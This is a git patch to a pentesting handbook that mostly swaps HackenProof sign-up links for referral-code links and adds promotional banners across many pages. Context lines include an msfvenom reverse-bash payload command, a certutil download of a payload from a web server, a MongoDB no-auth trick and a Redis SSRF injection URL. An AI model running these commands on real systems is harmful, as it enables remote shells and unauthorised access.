From e219464b71ade2d4e9ba3b71f4d469b18fbf83cc Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sat, 5 Nov 2022 10:07:43 +0100 Subject: [PATCH] new link --- README.md | 4 +-- .../pentesting-wifi/README.md | 12 +++---- .../shells/msfvenom.md | 21 ++++++++++++ .../shells/windows.md | 12 +++---- .../linux-privilege-escalation-checklist.md | 8 ++--- .../README.md | 12 +++---- .../android-app-pentesting/README.md | 24 +++++++------- .../android-applications-basics.md | 12 +++---- .../135-pentesting-msrpc.md | 8 ++--- .../27017-27018-mongodb.md | 22 +++++++++++++ .../5985-5986-pentesting-winrm.md | 12 +++---- .../6000-pentesting-x11.md | 20 +++++++++++ .../6379-pentesting-redis.md | 33 +++++++++++++++++++ ...09-pentesting-apache-jserv-protocol-ajp.md | 22 +++++++++++++ .../README.md | 12 +++---- network-services-pentesting/pentesting-ntp.md | 8 ++--- .../README.md | 12 +++---- .../csrf-cross-site-request-forgery.md | 12 +++---- pentesting-web/file-inclusion/README.md | 12 +++---- pentesting-web/reset-password.md | 8 ++--- pentesting-web/xpath-injection.md | 33 +++++++++++++++++-- .../asreproast.md | 33 ++++++++++++++++--- .../stealing-credentials/README.md | 12 +++---- 23 files changed, 267 insertions(+), 97 deletions(-) diff --git a/README.md b/README.md index a2f104948..7ab2aed12 100644 --- a/README.md +++ b/README.md @@ -82,9 +82,9 @@ Get Access Today: **Become the web3 hacker legend**\ ****Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. -[**Sign up on HackenProof**](https://hackenproof.com/register) to start earning from your hacks! +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to start earning from your hacks! -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ### [WebSec](https://websec.nl/) 
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 0a5747121..df9fb9d55 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -17,9 +17,9 @@ ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Wifi basic commands @@ -306,9 +306,9 @@ So broken and disappeared that I am not going to talk about it. Just know that _ ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## WPA/WPA2 PSK 
@@ -815,9 +815,9 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md index 9da18f3ae..eb775d506 100644 --- a/generic-methodologies-and-resources/shells/msfvenom.md +++ b/generic-methodologies-and-resources/shells/msfvenom.md @@ -17,6 +17,18 @@
+
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + + + `msfvenom -p -e -f -i LHOST=` One can also use the `-a` to specify the architecture or the `--platform` @@ -181,6 +193,15 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f ``` +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} +
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index a9041d8c7..d6680a638 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -19,9 +19,9 @@ ​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Lolbas @@ -330,9 +330,9 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## **Cscript/Wscript** 
@@ -583,9 +583,9 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index 7c5fa8bed..2fed3d5e7 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 
@@ -166,9 +166,9 @@ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index d643c8e37..2415e3b54 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Linux Privesc @@ -458,9 +458,9 @@ launchctl print gui//com.company.launchagent.label Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Auto Start Extensibility Point (ASEP) 
@@ -1265,9 +1265,9 @@ sudo killall -HUP mDNSResponder Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index a962922a6..7aad848ec 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -17,9 +17,9 @@ ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Android Applications Basics @@ -62,9 +62,9 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Static Analysis 
@@ -252,9 +252,9 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Dynamic Analysis @@ -505,9 +505,9 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Automatic Analysis 
@@ -717,9 +717,9 @@ Useful to detect malware: [https://koodous.com/](https://koodous.com) ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Obfuscating/Deobfuscating code @@ -799,9 +799,9 @@ For more information visit: ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 4f5cb9032..e1b8c9697 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -17,9 +17,9 @@ ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Android Security Model @@ -135,9 +135,9 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Intents 
@@ -463,9 +463,9 @@ Generally the MDM solutions perform functions like enforcing password policies, ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 4a9f5b4fa..eed1a55fc 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Basic Information @@ -109,9 +109,9 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index a9514613b..2fcba2341 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -12,6 +12,17 @@
+ +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + ## Basic Information MongoDB is an [open source](https://whatis.techtarget.com/definition/open-source) database management system (DBMS) that uses a document-oriented database model which supports various forms of data. (From [here](https://searchdatamanagement.techtarget.com/definition/MongoDB)) @@ -112,6 +123,17 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**. + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index b000e278f..5041660f4 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -19,9 +19,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## WinRM @@ -168,9 +168,9 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## WinRM connection in linux 
@@ -333,9 +333,9 @@ Entry_2: ​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 420182e56..a52946fcd 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -17,6 +17,16 @@
+
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + # Basic Information The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.\ @@ -151,6 +161,16 @@ Now as can be seen below we have complete system access: * `port:6000 x11` +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index 1d0994756..53d5a283c 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -12,6 +12,17 @@
+ +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + ## Basic Information Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker (from [here](https://redis.io/topics/introduction)). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). @@ -137,6 +148,17 @@ HGET **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + ## Redis RCE ### Interactive Shell @@ -307,6 +329,17 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._ + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index f184f4c2a..4414535bd 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -12,6 +12,17 @@
+ +
